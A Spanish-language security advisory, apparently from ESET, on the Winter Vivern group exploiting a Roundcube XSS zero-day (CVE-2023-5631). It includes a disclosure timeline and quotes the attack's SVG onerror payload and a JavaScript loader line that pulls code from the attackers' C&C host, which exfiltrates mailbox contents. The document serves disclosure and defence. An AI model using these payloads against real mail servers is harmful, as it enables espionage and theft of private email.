Winter Vivern explota una vulnerabilidad de zero-day en servidores de Roundcube Webmail

Este grupo APT ha estado atacando otros servidores de correo electrónico de entidades gubernamentales, al menos desde 2022. ESET Research recomienda actualizar Roundcube Webmail a la última versión disponible lo antes posible.

ESET Research ha estado siguiendo de cerca las operaciones de ciberespionaje de Winter Vivern durante más de un año y, durante nuestro monitoreo de rutina, descubrimos que el grupo comenzó a explotar una vulnerabilidad XSS de día cero en el servidor de correo web Roundcube el 11 de octubre de 2023. Se trata de una vulnerabilidad diferente a la CVE-2020-35730, que también fue explotada por el grupo según nuestra investigación.

Según los datos de telemetría de ESET, la campaña se dirigió a servidores de Roundcube Webmail pertenecientes a entidades gubernamentales y a un think tank, todos ellos en Europa.

Cronología de la divulgación de la vulnerabilidad:

  • 2023-10-12: ESET Research informó de la vulnerabilidad al equipo de Roundcube.
  • 2023-10-14: El equipo de Roundcube respondió y reconoció la vulnerabilidad.
  • 2023-10-14: El equipo de Roundcube parcheó la vulnerabilidad.
  • 2023-10-16: El equipo de Roundcube publicó actualizaciones de seguridad para solucionar la vulnerabilidad (1.6.4, 1.5.5 y 1.4.15).
  • 2023-10-18: ESET CNA publica un CVE para la vulnerabilidad(CVE-2023-5631).
  • 2023-10-25: Publicación del blog de ESET Research.

Nos gustaría agradecer a los desarrolladores de Roundcube por su rápida respuesta y por parchear la vulnerabilidad en tan poco tiempo.

Perfil de Winter Vivern

Winter Vivern es un grupo de ciberespionaje revelado por primera vez por DomainTools en 2021. Se cree que lleva activo al menos desde 2020 y sus objetivos son gobiernos de Europa y Asia Central. Para comprometer a sus objetivos, el grupo utiliza documentos maliciosos, sitios web de phishing y un backdoor PowerShell personalizado (véanse los artículos del Centro Estatal de Ciberprotección de Ucrania y de SentinelLabs). Creemos con poca confianza que Winter Vivern está vinculado a MoustachedBouncer, un sofisticado grupo alineado con Bielorrusia sobre el que publicamos por primera vez en agosto de 2023.

Winter Vivern ha estado atacando servidores de correo electrónico Zimbra y Roundcube pertenecientes a entidades gubernamentales al menos desde 2022 (véase este artículo de Proofpoint). En particular, observamos que el grupo explotó CVE-2020-35730, otra vulnerabilidad XSS en Roundcube, en agosto y septiembre de 2023. Sednit (también conocido como APT28) también está explotando esta antigua vulnerabilidad XSS en Roundcube, a veces contra los mismos objetivos.

Detalles técnicos

La explotación de la vulnerabilidad XSS, asignada CVE-2023-5631, puede realizarse de forma remota mediante el envío de un mensaje de correo electrónico especialmente diseñado. En esta campaña de Winter Vivern, los correos electrónicos se enviaron desde team.managment@outlook[.]com y tenían como asunto Get started in your Outlook, como se muestra en la Figura 1.

Figure-1-wintervivern-email
Figura 1. Mensaje de correo electrónico malicioso

A primera vista, el correo electrónico no parece malicioso, pero si examinamos el código fuente HTML, que se muestra en la Figura 2, podemos ver una etiqueta SVG al final, que contiene una carga útil codificada en base64.

Figure-2-winter-vivern-email-message
Figura 2. Mensaje de correo electrónico con una etiqueta SVG maliciosa

Una vez que decodificamos el valor codificado en base64 en el atributo href de la etiqueta use, tenemos:

<svg id=»x» xmlns=»http://www.w3.org/2000/svg»> <image href=»x» onerror=»eval(atob(‘<carga útil codificada en base64>’))» /></svg>

Como el argumento de valor x del atributo href no es una URL válida, se activará el atributo onerror de este objeto. Decodificando el payload en el atributo onerror obtenemos el siguiente código JavaScript (con la URL maliciosa modificada manualmente), que será ejecutado en el navegador de la víctima en el contexto de su sesión Roundcube:

var fe=document.createElement(‘script’);fe.src=»https://recsecas[.]com/controlserver/checkupdate.js»;document.body.appendChild(fe);

Sorprendentemente, nos dimos cuenta de que la inyección de JavaScript funcionaba en una instancia de Roundcube totalmente parcheada. Resultó que se trataba de una vulnerabilidad XSS de día cero que afectaba al script del lado del servidor rcube_washtml.php, que no sanea correctamente el documento SVG malicioso antes de añadirlo a la página HTML interpretada por un usuario de Roundcube. Informamos de ello a Roundcube y fue parcheado el14 de octubre de 2023 (ver este commit). La vulnerabilidad afecta a las versiones de Roundcube 1.6.x antes de 1.6.4, 1.5.x antes de 1.5.5, y 1.4.x antes de 1.4.15.

En resumen, mediante el envío de un mensaje de correo electrónico especialmente diseñado, los atacantes son capaces de cargar código JavaScript arbitrario en el contexto de la ventana del navegador del usuario de Roundcube. No se requiere ninguna interacción manual aparte de ver el mensaje en un navegador web.

La segunda etapa es un simple cargador JavaScript llamado checkupdate.js y se muestra en la Figura 3.

Figure-3-javascript-loader
Figura 3. Cargador JavaScript

El payload JavaScript final – mostrado en la Figura 4 – es capaz de listar carpetas y correos electrónicos en la cuenta Roundcube actual, y de exfiltrar mensajes de correo electrónico al servidor C&C haciendo peticiones HTTP a https://recsecas[.]com/controlserver/saveMessage.

Figure-4-final-payload
Figura 4. Carga útil JavaScript final exfiltrando mensajes de correo electrónico de la cuenta Roundcube (parte del script ofuscado eliminado para mayor claridad)

Conclusión

Winter Vivern intensificó sus operaciones utilizando una vulnerabilidad de día cero en Roundcube. Anteriormente, se valía de vulnerabilidades conocidas en Roundcube y Zimbra, de las que existen pruebas de concepto en línea.

A pesar de la escasa sofisticación de las herramientas del grupo, constituye una amenaza para los gobiernos europeos debido a su persistencia, a la realización muy regular de campañas de phishing y al hecho de que un número significativo de aplicaciones orientadas a Internet no se actualizan con regularidad a pesar de que se sabe que contienen vulnerabilidades.

Fuente noticia: welivesecurity.com
Fuente imágen: freepik.com